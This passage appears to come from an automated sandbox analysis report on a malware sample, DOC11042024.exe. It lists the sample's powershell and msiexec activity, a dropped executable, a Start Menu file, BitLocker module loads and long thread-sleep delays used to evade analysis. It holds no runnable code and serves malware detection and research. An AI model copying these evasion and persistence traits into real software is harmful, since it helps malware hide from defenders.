          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09045CB2 push es; iretd 2_2_09045CB9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_090446DE push edx; ret 2_2_090446DF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005BB025 push ds; retf 5_2_005BB026
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B48E1 push eax; ret 5_2_005B48E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B494A push eax; ret 5_2_005B4952
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B4977 push eax; ret 5_2_005B4982
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B4968 push eax; ret 5_2_005B4972
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B891E pushad ; iretd 5_2_005B891F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B4917 push eax; ret 5_2_005B4922
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B4901 push eax; ret 5_2_005B4902
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B4907 push eax; ret 5_2_005B4912
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_005B5E3A push edx; retf 5_2_005B5E48
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213\DOC11042024.exeJump to dropped file
          Source: C:\Users\user\Desktop\DOC11042024.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\bestialitet.iniJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599670Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599452Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599124Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598469Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597467Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597250Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597141Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595543Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595328Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594562Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6766Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2921Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep count: 35 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -32281802128991695s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 2740Thread sleep count: 1397 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -599890s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 2740Thread sleep count: 8454 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -599670s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -599562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -599452s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -599344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -599234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -599124s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -599016s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -598906s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -598797s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -598687s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -598578s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -598469s >= -30000sJump to behavior
